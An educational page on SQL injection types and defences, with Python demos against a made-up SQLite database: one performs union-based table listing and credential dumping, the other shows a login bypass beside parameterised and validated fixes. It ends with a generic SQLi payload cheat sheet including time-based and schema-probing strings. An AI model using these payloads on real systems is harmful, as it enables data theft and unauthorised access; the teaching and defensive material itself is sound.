
SQL injection (SQLi)

SQL injection (SQLi) is an attack in which attacker-controlled input is placed into an application's SQL query without being kept separate from the query's structure, so the input is parsed as part of the command rather than as a value. A successful injection lets the attacker read, modify or delete data in the database, and in some configurations reach beyond it to the host.

Consequences of a Successful SQL Injection Attack


SQL injection attacks can have a significant negative impact on an organization. Organizations store
sensitive company data and private customer information, and SQL injection attacks often target
exactly that confidential information. When a malicious user successfully completes an SQL injection
attack, it can have any of the following impacts:

Exposes Sensitive Company Data: Using SQL injection, attackers can retrieve and alter any data the
application's database account is allowed to read, which risks exposing sensitive company data stored
on the database server.

Compromise Users' Privacy: Depending on the data stored on the database server, an attack can expose
private user data, such as credit card numbers, credentials and personal details.

Give an attacker administrative access to your system: If the account the application uses to connect
to the database has administrative privileges, an injection can be escalated beyond the database. On
some platforms a DBA-level account can read and write files on the host or execute operating-system
commands (Microsoft SQL Server's xp_cmdshell and MySQL's LOAD_FILE / INTO OUTFILE are the usual
examples). To limit this, connect with a database user that has the least privileges the application
actually needs: typically SELECT, INSERT, UPDATE and DELETE on its own tables, with no schema changes,
no file access and no OS-command features.

Give an Attacker General Access to Your System: If the login check builds its query by concatenating
the submitted username and password into the SQL text, an attacker can comment out the password
condition or append an always-true condition and log in without knowing any user's credentials. With
general access to your system, an attacker can cause additional damage by accessing and manipulating
sensitive information.

Compromise the Integrity of Your Data: Using SQL injection, attackers can change or delete
information in your system; an injected UPDATE, DELETE or DROP corrupts or destroys data, and the
change may go unnoticed until the corrupted data is used.

3 Types of SQL Injection


1. In-band SQL Injection
In-band SQL injection is the most common type of attack. With this type of SQL injection attack, a
malicious user uses the same communication channel (the application's normal request and response)
both to deliver the attack and to collect the results. The following techniques are the most common
types of in-band SQL injection attacks:

Error-based SQL injection: With this technique, attackers learn about the database structure by
sending input that makes the database server raise an error and reading the error message the
application returns. Detailed error messages are useful while developing a web application or web
page, but in production they are an information leak: a message such as an "ORDER BY term out of
range" or a type-conversion error tells the attacker the column count, table and column names, or
even data values. To remove this leak, return a generic error to the client once the site or
application is live and log the detailed database error server-side only. This hides the
information but does not fix the injection itself; the same flaw stays exploitable with union-based
or blind techniques.

Union-based SQL injection: The attacker appends a UNION SELECT that pulls rows from another table
into the result set the application already displays. It requires matching the column count of the
original query (typically probed with ORDER BY n, or UNION SELECT NULL,NULL,... until no error
occurs) and compatible column types; the payload list later on this page contains the usual probes.
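As an added example (not code from the original page), the following Python script builds a constructed SQLite in-memory catalogue with a hypothetical lookup endpoint that concatenates its input and echoes raw database errors, then runs the error-based probe (ORDER BY n until the database complains) to learn the column count and a union-based query to list tables and pull credentials out of a table the endpoint was never meant to expose. The table names, rows and hash value are made up for the demo. It goes a step beyond the paragraph above by including the union-based extraction that normally follows the error-based probe, and a hardened version of the same endpoint for contrast.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed in-memory schema: a public catalogue plus a users table the
    attacker should never be able to read. Rows and hash are made up."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products(id INTEGER, name TEXT, price REAL);
        INSERT INTO products VALUES (1, 'widget', 9.99), (2, 'gadget', 19.99);
        CREATE TABLE users(id INTEGER, username TEXT, pw_hash TEXT);
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
        """
    )
    return conn


def product_lookup(conn: sqlite3.Connection, product_id: str) -> str:
    """Vulnerable endpoint (hypothetical): the id is concatenated into the SQL
    text and any database error is echoed to the client. Those two mistakes
    are exactly what error-based and union-based SQLi need."""
    query = f"SELECT id, name, price FROM products WHERE id = {product_id}"
    try:
        rows = conn.execute(query).fetchall()
    except sqlite3.Error as exc:
        return f"ERROR: {exc}"  # leaks database internals to the attacker
    return "\n".join(",".join(str(col) for col in row) for row in rows)


def product_lookup_safe(conn: sqlite3.Connection, product_id: str) -> str:
    """Hardened endpoint: bound parameter, generic client error, details kept
    server-side (print stands in for a logger here)."""
    try:
        rows = conn.execute(
            "SELECT id, name, price FROM products WHERE id = ?", (product_id,)
        ).fetchall()
    except sqlite3.Error as exc:
        print(f"[server log] database error: {exc}")
        return "ERROR: request failed"
    return "\n".join(",".join(str(col) for col in row) for row in rows)


def find_column_count(conn: sqlite3.Connection, max_cols: int = 10) -> int:
    """Error-based probe: ORDER BY n succeeds while n <= column count and
    raises 'term out of range' as soon as n exceeds it."""
    for n in range(1, max_cols + 1):
        if product_lookup(conn, f"1 ORDER BY {n}--").startswith("ERROR"):
            return n - 1
    raise RuntimeError("column count exceeds max_cols")


def union_first_column(conn: sqlite3.Connection, ncols: int, expr: str, source: str) -> list:
    """Union-based extraction: pad the attacker's SELECT with NULLs to ncols so
    the UNION is valid, then read the smuggled values from column 1 of what
    the application renders. The leading id -1 matches no real product."""
    pad = ",NULL" * (ncols - 1)
    payload = f"-1 UNION SELECT {expr}{pad} FROM {source}--"
    out = product_lookup(conn, payload)
    return [line.split(",")[0] for line in out.splitlines()]


def list_tables(conn: sqlite3.Connection, ncols: int) -> list:
    """SQLite keeps its schema in sqlite_master (information_schema elsewhere)."""
    return union_first_column(conn, ncols, "name", "sqlite_master WHERE type='table'")


def dump_credentials(conn: sqlite3.Connection, ncols: int) -> list:
    """Concatenate two columns into the single displayed column."""
    return union_first_column(conn, ncols, "username||':'||pw_hash", "users")


if __name__ == "__main__":
    db = build_db()
    ncols = find_column_count(db)
    print("columns:", ncols)                       # 3
    print("tables:", list_tables(db, ncols))       # ['products', 'users']
    print("creds:", dump_credentials(db, ncols))   # ['admin:5f4dcc3b5aa765d61d8327deb882cf99']
    print("safe:", repr(product_lookup_safe(db, "1 ORDER BY 4--")))  # ''
```

Against the hardened endpoint the same ORDER BY payload is just a string that matches no id, so it returns nothing and leaks nothing; the injection is removed by the bound parameter, and the generic error message only stops the information leak.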

2. Inferential SQL Injection


Inferential SQL injection is also called blind SQL injection because the application does not return
database data or error messages to the attacker as it does with in-band SQL injection. Instead, the
attacker sends payloads and observes how the application's behaviour changes, learning about the
structure and contents of the database one yes/no answer at a time. Inferential attacks are less
common than in-band attacks because each request yields only a bit of information, so extracting
data takes many requests and more time (though the process is routinely automated). The two types of
inferential SQL injection attacks use the following techniques:

Boolean injection: With this technique, attackers inject a condition into the query (for example
AND 1=1, then AND 1=2) and observe the result. If the HTTP response differs between the true case and
the false case (a record shown or not, a different page length or status), the attacker has a
true/false oracle and can ask arbitrary questions about the database, such as whether the first
character of a stored value is greater than a given character, and so extract data character by
character.

Time-based injection: With this technique, attackers send a SQL query that makes the database pause
for a specific number of seconds (MySQL SLEEP(), Microsoft SQL Server WAITFOR DELAY, PostgreSQL
pg_sleep()) only when a condition is true. Attackers determine whether the condition holds from the
time that elapses before the response arrives, which works even when the page content is identical
in both cases. For example, an attacker could use a SQL query that delays if the first letter of the
current database's name is "A"; if the response is delayed, the attacker knows the condition is true.
Network jitter can produce false readings, so the delay is chosen well above the normal response
time and results are confirmed by repeating the request.

3. Out-of-Band SQL Injection


Out-of-band SQL injection is the least common type of attack. With this type of SQL injection attack,
malicious users deliver the attack through the application but collect the results over a different
communication channel, typically a DNS lookup or HTTP request that the database server itself is made
to send to an attacker-controlled host, with the extracted data encoded in the hostname or URL.
Attackers use this method when the application's responses reveal nothing (no data, no errors and no
usable timing difference), or when the server is too slow or unstable to use inferential or in-band
techniques reliably. It depends on the database having features that can make network requests and
on the database host being allowed to reach the internet, so blocking outbound connections from
database servers is an effective mitigation.

How to Prevent SQL Injection


1. Use Stored Procedures, Not Dynamic SQL
Consider our earlier dynamic SQL example. In the images below, you can see what it
looks like after a user executes SQL injection in the login form. Notice that the fourth
statement will be ignored, since "--" starts a comment and the database discards the rest of
the line, while the third always evaluates to "true". This results in a successful login, even
if the username and password are incorrect (see Images 1.1 and 1.2). Stored procedures avoid
this only when they receive their inputs as typed parameters; a procedure that concatenates its
arguments into a string and executes it (dynamic SQL inside the procedure) is just as
injectable as the original query.
2. Use Prepared Statements
Prepared Statements (PS) are pre-compiled SQL commands created inside a program that can
be reused many times over the course of the application's lifecycle. The statement text, with
placeholders where the values go, is sent to the database and parsed once; the input values are
sent separately and bound to the placeholders. Bound parameters are treated strictly as data
values, never as SQL, so no input can alter the statement's structure during an SQL injection
attempt. Consider the example in Image 2.1: a PS variation of the dynamic SQL query introduced
earlier maintains the intended login behavior despite the SQL injection parameters in Image 2.2.
Image 2.3 shows the resulting SQL command after the input parameters were bound to the PS. This
does not cause any unexpected SQL results or program outcomes. Two caveats: a prepared statement
whose text is itself assembled by concatenating user input gains nothing, and only values can be
bound. Identifiers such as table or column names and the ORDER BY direction cannot be parameters,
so if they come from user input they must be checked against an allowlist.

3. Input Validation
Validating input plays a significant role in preventing SQL injection. Input that does not match
the expected shape is rejected before the server processes it or passes it to the database; an
email validator, or a check that a numeric id contains only digits, is an example of input
validation. There are two types of validation: server side and client side. Only server-side
validation is a security control, because client-side checks run in the attacker's browser and
are bypassed by sending the request directly. Prefer allowlists (what valid input looks like)
over blocklists of "dangerous" characters, and treat validation as a defence-in-depth layer
alongside parameterized queries rather than a replacement for them.
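As an added example that is not code from the original page, the following Python script puts the three measures above side by side on a constructed SQLite in-memory users table: a login built by string concatenation (the "--" comment bypass from item 1), the same check as a prepared statement with bound parameters (item 2), and a server-side allowlist validation in front of it (item 3). SQLite has no stored procedures, so that variant is not shown; a procedure that takes typed parameters behaves like the prepared statement here. SHA-256 stands in for a real password hash purely so the query has a hash column to compare; it is not a recommendation.

```python
import hashlib
import re
import sqlite3


def _hash(password: str) -> str:
    # Demo stand-in only: real systems use bcrypt, scrypt or argon2 for passwords.
    return hashlib.sha256(password.encode()).hexdigest()


def build_db() -> sqlite3.Connection:
    """Constructed in-memory users table with one made-up account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(username TEXT, pw_hash TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("alice", _hash("correct horse")))
    return conn


def login_dynamic(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Vulnerable: the statement is assembled by string concatenation. A
    username of  alice' --  comments out the password check, and
    ' OR 1=1 --  makes the WHERE clause true for every row."""
    query = (
        f"SELECT username FROM users WHERE username = '{username}' "
        f"AND pw_hash = '{_hash(password)}'"
    )
    return conn.execute(query).fetchone() is not None


def login_prepared(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened: the SQL text is constant and the values are bound separately,
    so the quote and comment characters in a payload are compared as data
    and never reach the SQL parser."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND pw_hash = ?",
        (username, _hash(password)),
    ).fetchone()
    return row is not None


# Allowlist for a username: letters, digits, dot, underscore, hyphen; 1 to 32 characters.
USERNAME_RE = re.compile(r"[A-Za-z0-9._-]{1,32}")


def login_validated(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Defence in depth: server-side allowlist validation in front of the bound
    query. The regex rejects the payloads before any SQL runs, but it is the
    bound parameter that actually removes the injection."""
    if USERNAME_RE.fullmatch(username) is None:
        return False
    return login_prepared(conn, username, password)


if __name__ == "__main__":
    db = build_db()
    attempts = [("alice", "correct horse"), ("alice' --", "wrong"), ("' OR 1=1 --", "wrong")]
    for user, pwd in attempts:
        print(
            f"{user!r:16} dynamic={login_dynamic(db, user, pwd)} "
            f"prepared={login_prepared(db, user, pwd)} validated={login_validated(db, user, pwd)}"
        )
```

Run as a script it prints True for all three functions on the genuine credentials, and True only in the dynamic column for the two payloads: the concatenated query logs the attacker in without a valid password, while the prepared and validated versions reject the same input.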

Generic SQL Injection Payloads


'

''

``

"
""

//

\\

' or "

-- or #

' OR '1

' OR 1 -- -

" OR "" = "

" OR 1 = 1 -- -

' OR '' = '

'='

'LIKE'

'=0--+

OR 1=1

' OR 'x'='x

' AND id IS NULL; --

'''''''''''''UNION SELECT '2

%00

/*…*/

+ addition, concatenate (or space in url)

|| (double pipe) concatenate

% wildcard attribute indicator

@variable local variable

@@variable global variable


# Numeric

AND 1

AND 0

AND true

AND false

1-false

1-true

1*56

-2

1' ORDER BY 1--+

1' ORDER BY 2--+

1' ORDER BY 3--+

1' ORDER BY 1,2--+

1' ORDER BY 1,2,3--+

1' GROUP BY 1,2,--+

1' GROUP BY 1,2,3--+

' GROUP BY columnnames having 1=1 --

-1' UNION SELECT 1,2,3--+

' UNION SELECT sum(columnname ) from tablename --

-1 UNION SELECT 1 INTO @,@


-1 UNION SELECT 1 INTO @,@,@

1 AND (SELECT * FROM Users) = 1

' AND MID(VERSION(),1,1) = '5';

Finding the table name (Microsoft SQL Server, via sysobjects):

' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --

Time-Based:

,(select * from (select(sleep(10)))a)

%2c(select%20*%20from%20(select(sleep(10)))a)

';WAITFOR DELAY '0:0:30'--

Comments:

# Hash comment

/* C-style comment

-- - SQL comment

;%00 Nullbyte

` Backtick
